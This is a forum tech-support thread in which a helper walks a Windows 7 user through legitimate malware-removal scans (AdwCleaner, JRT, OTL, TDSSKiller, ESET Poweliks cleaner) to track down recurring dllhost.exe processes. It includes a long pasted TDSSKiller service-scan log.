# Running from : C:\Users\Ryan\Desktop\AdwCleaner.exe
# Option : Clean
***** [ Services ] *****
***** [ Files / Folders ] *****
***** [ Scheduled Tasks ] *****
***** [ Shortcuts ] *****
***** [ Registry ] *****
***** [ Browsers ] *****
-\\ Internet Explorer v11.0.9600.17344
*************************
AdwCleaner[R0].txt - [670 octets] - [03/11/2014 18:21:38]
AdwCleaner[S0].txt - [592 octets] - [03/11/2014 18:22:51]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [651 octets] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.5 (10.31.2014:1)
OS: Windows 7 Home Premium x64
Ran by Ryan on Mon 11/03/2014 at 18:27:59.66
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~ Services
~~~ Registry Values
~~~ Registry Keys
~~~ Files
~~~ Folders
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 11/03/2014 at 18:29:46.58
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Are we still good?
Scans didn't show anything alarming.
ascot1340
2014-11-04, 04:38
Something's wrong with my internet browser. Some pages (like this forum) open fine, but other pages (Google, for example) won't open and just show a blank white page.
Seems many are having this problem.
Click on the three horizontal lines at the far right end of the Chrome address bar.
Go to Settings, then Advanced Settings
At the very bottom of the page, click on Reset Browser Settings.
Click back to page 11
https://productforums.google.com/forum/#!topic/chrome/FwgIERQmHxg
scroll to post from Sarah MM
ascot1340
2014-11-04, 22:36
I'm using Internet Explorer not Google Chrome, but I tried the same thing (resetting the Internet Explorer settings under the Advanced Internet Options) and it seems to have done the trick. Still no sign of the duplicate dllhost.exe *32 processes in the task manager, so hopefully they don't come back this time!
ascot1340
2014-11-04, 22:48
It's back, and I just watched it happen. I was browsing the internet (reading an article about a novel) when a little black window opened for a second and then closed. Then I looked in the task manager and the dllhost.exe *32 processes are back.
Don't know where this is hiding.
Download OTL (http://oldtimer.geekstogo.com/OTL.exe) to your desktop.
Double click on the icon to run it.
Make sure all other windows are closed and to let it run uninterrupted.
Select All Users.
Under the Custom Scan box paste this text in bold in
netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
winsock.*
/md5stop
CREATERESTOREPOINT
Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan won't take long.
When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
Post both logs DO NOT ATTACH THEM.
~~~~~~~~~~~~~~~~~~~~~
Download the latest version of TDSSKiller from here (http://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe) and save it to your Desktop.
Double-click on TDSSKiller.exe to run the application
Then click on Change parameters.
Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects, then click OK.
Click the Start Scan button.
If a suspicious object is detected, the default action will be Skip, click on Continue.
If malicious objects are found, they will show in the Scan results and offer three (3) options.
Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
Get the report by selecting Reports
Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
Please copy and paste its contents on your next reply.
A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.
*****
Both of these logs will be long; if need be, make multiple posts.
Step 1
Please download Powelikscleaner (http://download.eset.com/special/ESETPoweliksCleaner.exe) (by ESET) and save it to your Desktop.
Double-click ESETPoweliksCleaner.exe to start the tool.
Read the terms of the End-user license agreement and click Agree if you agree to them.
The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it.
If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed. Press any key to exit the tool and reboot your PC.
The tool will produce a log in the same directory the tool was run from.
Please copy and paste the log in your next reply.
ascot1340
2014-11-07, 00:02
The duplicate dllhost.exe *32 processes haven't returned after my last post. Should I go ahead and run the scans you suggested in your last two posts or wait to see if the problem comes back and run them while the processes are active?
Go ahead and run TDSSKiller and ESETPoweliksCleaner.exe
ascot1340
2014-11-07, 23:36
The logs exceed the 200000 character limit so I'll have to break them up and paste them in separate posts. TDSSKiller detected one threat but "Cure" wasn't an option so I selected "skip." ESETPoweliksCleaner.exe says "Threat Not Found." The duplicate processes still aren't running in the task manager, but I did have to reset my internet security settings to default levels again to be able to download the tools.
15:58:36.0103 0x4ac4 TDSS rootkit removing tool 3.0.0.41 Oct 28 2014 17:58:34
15:58:41.0594 0x4ac4 ============================================================
15:58:41.0594 0x4ac4 Current date / time: 2014/11/07 15:58:41.0594
15:58:41.0594 0x4ac4 SystemInfo:
15:58:41.0594 0x4ac4
15:58:41.0594 0x4ac4 OS Version: 6.1.7601 ServicePack: 1.0
15:58:41.0594 0x4ac4 Product type: Workstation
15:58:41.0594 0x4ac4 ComputerName: RYAN-PC
15:58:41.0594 0x4ac4 UserName: Ryan
15:58:41.0594 0x4ac4 Windows directory: C:\Windows
15:58:41.0594 0x4ac4 System windows directory: C:\Windows
15:58:41.0594 0x4ac4 Running under WOW64
15:58:41.0594 0x4ac4 Processor architecture: Intel x64
15:58:41.0594 0x4ac4 Number of processors: 8
15:58:41.0594 0x4ac4 Page size: 0x1000
15:58:41.0594 0x4ac4 Boot type: Normal boot
15:58:41.0594 0x4ac4 ============================================================
15:58:41.0735 0x4ac4 KLMD registered as C:\Windows\system32\drivers\24745424.sys
15:58:42.0343 0x4ac4 System UUID: {083DED25-CA73-B384-BB03-73A759006CA2}
15:58:43.0342 0x4ac4 Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
15:58:43.0357 0x4ac4 ============================================================
15:58:43.0357 0x4ac4 \Device\Harddisk0\DR0:
15:58:43.0373 0x4ac4 MBR partitions:
15:58:43.0373 0x4ac4 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x12C800, BlocksNum 0x72E69800
15:58:43.0373 0x4ac4 ============================================================
15:58:43.0451 0x4ac4 C: <-> \Device\Harddisk0\DR0\Partition1
15:58:43.0451 0x4ac4 ============================================================
15:58:43.0451 0x4ac4 Initialize success
15:58:43.0451 0x4ac4 ============================================================
15:59:29.0284 0x42d8 ============================================================
15:59:29.0284 0x42d8 Scan started
15:59:29.0284 0x42d8 Mode: Manual; SigCheck; TDLFS;
15:59:29.0284 0x42d8 ============================================================
15:59:29.0284 0x42d8 KSN ping started
15:59:31.0780 0x42d8 KSN ping finished: true
15:59:32.0763 0x42d8 ================ Scan system memory ========================
15:59:32.0763 0x42d8 System memory - ok
15:59:32.0763 0x42d8 ================ Scan services =============================
15:59:35.0134 0x42d8 [ 379A6AB7F2AD8FC61B1306767083D705, 7B484048EC2A66EA09D4B5B9312C517A9C3618C7A5B952E863DF31DE9EA38603 ] AtherosSvc C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
15:59:35.0149 0x42d8 AtherosSvc - detected UnsignedFile.Multi.Generic ( 1 )
15:59:37.0723 0x42d8 Detect skipped due to KSN trusted
15:59:37.0723 0x42d8 AtherosSvc - ok
15:59:42.0513 0x42d8 [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
15:59:42.0544 0x42d8 drmkaud - ok
15:59:42.0591 0x42d8 [ F59E2FE2687A5C30598F9099F318EB73, 80A0B1CC758BD3C4AEAB8E5804120D8A145F918B527F41DEF02A0E4EBE170F37 ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
15:59:42.0637 0x42d8 DXGKrnl - ok
15:59:42.0684 0x42d8 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll
15:59:42.0715 0x42d8 EapHost - ok
15:59:42.0825 0x42d8 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\drivers\evbda.sys
15:59:42.0903 0x42d8 ebdrv - ok
15:59:42.0934 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS C:\Windows\System32\lsass.exe
15:59:42.0949 0x42d8 EFS - ok
15:59:43.0043 0x42d8 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
15:59:43.0074 0x42d8 ehRecvr - ok
15:59:43.0090 0x42d8 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe
15:59:43.0105 0x42d8 ehSched - ok
15:59:43.0230 0x42d8 [ 4CB575D97653FA91FFB02DA3105EB084, 59FB4D2485EEDBCC56D92C1F5DF3FEAE67D751F3AD7AEA7590F3C73107C829E8 ] ekrn C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
15:59:43.0261 0x42d8 ekrn - ok
15:59:43.0324 0x42d8 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\drivers\elxstor.sys
15:59:43.0355 0x42d8 elxstor - ok
15:59:43.0371 0x42d8 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys
15:59:43.0371 0x42d8 ErrDev - ok
15:59:43.0433 0x42d8 [ 7029424F0F72B1E9912FA42786ED98A9, 8D70E4302991E0174F0C4658BB793A88DFC121F1858127B903B3E2E01DEECA7F ] ESETOlmarikOlmascoCleaner C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys
15:59:43.0464 0x42d8 ESETOlmarikOlmascoCleaner - ok
15:59:43.0495 0x42d8 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll
15:59:43.0527 0x42d8 EventSystem - ok
15:59:43.0542 0x42d8 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\Windows\system32\drivers\exfat.sys
15:59:43.0573 0x42d8 exfat - ok
15:59:43.0589 0x42d8 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\Windows\system32\drivers\fastfat.sys
15:59:43.0620 0x42d8 fastfat - ok
15:59:43.0667 0x42d8 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe
15:59:43.0683 0x42d8 Fax - ok
15:59:43.0714 0x42d8 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\drivers\fdc.sys
15:59:43.0714 0x42d8 fdc - ok
15:59:43.0745 0x42d8 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll
15:59:43.0823 0x42d8 fdPHost - ok
15:59:43.0839 0x42d8 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll
15:59:43.0854 0x42d8 FDResPub - ok
15:59:43.0901 0x42d8 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
15:59:43.0901 0x42d8 FileInfo - ok
15:59:43.0917 0x42d8 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys
15:59:43.0932 0x42d8 Filetrace - ok
15:59:43.0948 0x42d8 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\drivers\flpydisk.sys
15:59:43.0948 0x42d8 flpydisk - ok
15:59:43.0979 0x42d8 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
15:59:43.0995 0x42d8 FltMgr - ok
15:59:44.0088 0x42d8 [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache C:\Windows\system32\FntCache.dll
15:59:44.0119 0x42d8 FontCache - ok
15:59:44.0166 0x42d8 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
15:59:44.0166 0x42d8 FontCache3.0.0.0 - ok
15:59:44.0213 0x42d8 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys
15:59:44.0244 0x42d8 FsDepends - ok
15:59:44.0275 0x42d8 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
15:59:44.0291 0x42d8 Fs_Rec - ok
15:59:44.0338 0x42d8 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys
15:59:44.0416 0x42d8 fvevol - ok
15:59:44.0431 0x42d8 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
15:59:44.0447 0x42d8 gagp30kx - ok
15:59:44.0478 0x42d8 [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
15:59:44.0494 0x42d8 GEARAspiWDM - ok
15:59:44.0556 0x42d8 [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] gpsvc C:\Windows\System32\gpsvc.dll
15:59:44.0603 0x42d8 gpsvc - ok
15:59:44.0603 0x42d8 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys
15:59:44.0619 0x42d8 hcw85cir - ok
15:59:44.0650 0x42d8 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
15:59:44.0665 0x42d8 HdAudAddService - ok
15:59:44.0697 0x42d8 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys
15:59:44.0712 0x42d8 HDAudBus - ok
15:59:44.0759 0x42d8 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\drivers\HidBatt.sys
15:59:44.0775 0x42d8 HidBatt - ok
15:59:44.0790 0x42d8 [ FDF5EAD19FD8B2D0C50A9CCDD7836F9E, B865703E3D9BFC75DF363BF943213C47A63445415E211000717009D2BD0C062B ] HidBth C:\Windows\system32\drivers\hidbth.sys
15:59:44.0806 0x42d8 HidBth - ok
15:59:44.0837 0x42d8 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\drivers\hidir.sys
15:59:44.0853 0x42d8 HidIr - ok
15:59:44.0884 0x42d8 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\System32\hidserv.dll
15:59:44.0931 0x42d8 hidserv - ok
15:59:44.0977 0x42d8 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\drivers\hidusb.sys
15:59:45.0009 0x42d8 HidUsb - ok
15:59:45.0087 0x42d8 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll
15:59:45.0118 0x42d8 hkmsvc - ok
15:59:45.0149 0x42d8 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
15:59:45.0149 0x42d8 HomeGroupListener - ok
15:59:45.0196 0x42d8 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
15:59:45.0196 0x42d8 HomeGroupProvider - ok
15:59:45.0243 0x42d8 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys
15:59:45.0258 0x42d8 HpSAMD - ok
15:59:45.0289 0x42d8 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP C:\Windows\system32\drivers\HTTP.sys
15:59:45.0321 0x42d8 HTTP - ok
15:59:45.0336 0x42d8 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys
15:59:45.0352 0x42d8 hwpolicy - ok
15:59:45.0430 0x42d8 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\drivers\i8042prt.sys
15:59:45.0477 0x42d8 i8042prt - ok
15:59:45.0555 0x42d8 [ D1753C06EE17E29352B065EACF3F10D0, 4DD4C991FAA3CCF99DF8DC9F8F5DEEDEECD55977F0C3AA8C404DEFD21E32A62B ] iaStor C:\Windows\system32\drivers\iaStor.sys
15:59:45.0570 0x42d8 iaStor - ok
15:59:45.0648 0x42d8 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys
15:59:45.0664 0x42d8 iaStorV - ok
15:59:45.0742 0x42d8 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
15:59:45.0835 0x42d8 idsvc - ok
15:59:45.0867 0x42d8 IEEtwCollectorService - ok
15:59:46.0288 0x42d8 [ 9AA61DC7AA32C1D1260C4267FF07E0C1, 34FEE032C2585600E612A6CFEE33AD4C0C140B04ADB0B08825F2FC5505480366 ] igfx C:\Windows\system32\DRIVERS\igdkmd64.sys
15:59:46.0709 0x42d8 igfx - ok
15:59:46.0740 0x42d8 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\drivers\iirsp.sys
15:59:46.0756 0x42d8 iirsp - ok
15:59:46.0849 0x42d8 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll
15:59:46.0881 0x42d8 IKEEXT - ok
15:59:47.0037 0x42d8 [ 0043EC20C06FD9FE339B5D37474B731E, E84A078BDBEC7EA29257D758030271B62F3ED2C954DC1EEECC5B24B39EDB2A59 ] Intel(R) Capability Licensing Service Interface c:\Program Files\Intel\iCLS Client\HeciServer.exe
15:59:47.0598 0x42d8 Intel(R) Capability Licensing Service Interface - ok
15:59:47.0739 0x42d8 [ BE421E3E33EE3BD63F0AA99E28CFE258, 11D9FE5012E21CB61F248FC75768BF53F94744D5E7D90763DD2E3F6687559B77 ] Intel(R) ME Service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
15:59:47.0770 0x42d8 Intel(R) ME Service - ok
15:59:47.0801 0x42d8 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys
15:59:47.0817 0x42d8 intelide - ok
15:59:47.0863 0x42d8 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
15:59:47.0879 0x42d8 intelppm - ok
15:59:47.0941 0x42d8 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll
15:59:48.0004 0x42d8 IPBusEnum - ok
15:59:48.0019 0x42d8 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
15:59:48.0066 0x42d8 IpFilterDriver - ok
15:59:48.0191 0x42d8 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
15:59:48.0285 0x42d8 iphlpsvc - ok
15:59:48.0300 0x42d8 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys
15:59:48.0316 0x42d8 IPMIDRV - ok
15:59:48.0316 0x42d8 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys
15:59:48.0363 0x42d8 IPNAT - ok
15:59:48.0441 0x42d8 [ 842D1EDD0F2A6E0E6631BB96BAAA01DE, 9CDD0B99F2C5DAD573A9EA8D5AB2DBFD7A941454CBBA5BFE34E49F2D4EE96A90 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
15:59:48.0472 0x42d8 iPod Service - ok
15:59:48.0487 0x42d8 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys
15:59:48.0503 0x42d8 IRENUM - ok
15:59:48.0534 0x42d8 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys
15:59:48.0550 0x42d8 isapnp - ok
15:59:48.0581 0x42d8 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys
15:59:48.0597 0x42d8 iScsiPrt - ok
15:59:48.0643 0x42d8 [ 846354992EBB373F452EB9182D501B08, 453459133DCA875E93CAAE9852E652F3794F8C31CE53526C47A181FDBABE6849 ] iusb3hcs C:\Windows\system32\drivers\iusb3hcs.sys
15:59:48.0659 0x42d8 iusb3hcs - ok
15:59:48.0675 0x42d8 [ 1D88A23853387D34D52CC8F9DDBFC56C, D00083B61E93E7E1D247EAB332787912FCF7605AF7043F071238C50E4A15016B ] iusb3hub C:\Windows\system32\DRIVERS\iusb3hub.sys
15:59:48.0690 0x42d8 iusb3hub - ok
15:59:48.0768 0x42d8 [ FC5EFD7C797DF19DFB999F0605A7924E, C56CE3840F3B11D81BED38E5F59ABCA190DFB7127F06263193870312A83379AF ] iusb3xhc C:\Windows\system32\DRIVERS\iusb3xhc.sys
15:59:48.0784 0x42d8 iusb3xhc - ok
15:59:48.0831 0x42d8 [ D4A7FACFDF041069531DC0185879ECF6, 923226F260A54FA6152CA8C1A46848FA9D49CE34F53E64DE143B64099E5E79C0 ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
15:59:48.0862 0x42d8 jhi_service - ok
15:59:48.0893 0x42d8 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
15:59:48.0909 0x42d8 kbdclass - ok
15:59:48.0940 0x42d8 [ 3985332405FA64D8E679A1DB24901596, CA4C274704B9F4AE560CC32AD7C22D39ADAD13C61709E21F70C9B1AACE34B7A2 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
15:59:48.0955 0x42d8 kbdhid - ok
15:59:48.0971 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso C:\Windows\system32\lsass.exe
15:59:48.0987 0x42d8 KeyIso - ok
15:59:49.0049 0x42d8 [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
15:59:49.0065 0x42d8 KSecDD - ok
15:59:49.0080 0x42d8 [ 1C2D8E18AA8FD50CD04C15CC27F7F5AB, 4BA3B0F9F01BD47D66091D3AD86B69A523981D61DFB4D677F2CD39405B2DA989 ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys
15:59:49.0096 0x42d8 KSecPkg - ok
15:59:49.0096 0x42d8 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys
15:59:49.0111 0x42d8 ksthunk - ok
15:59:49.0158 0x42d8 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll
15:59:49.0252 0x42d8 KtmRm - ok
15:59:49.0299 0x42d8 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\System32\srvsvc.dll
15:59:49.0330 0x42d8 LanmanServer - ok
15:59:49.0361 0x42d8 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
15:59:49.0377 0x42d8 LanmanWorkstation - ok
15:59:49.0423 0x42d8 [ 02538E602280C07438C94489DCBE77D5, 2E2B60E5FB7A274F4945444D5EDB058E62CAC268C5336FF8F4B9E82245095211 ] libusb0 C:\Windows\system32\DRIVERS\libusb0.sys
15:59:49.0517 0x42d8 libusb0 - ok
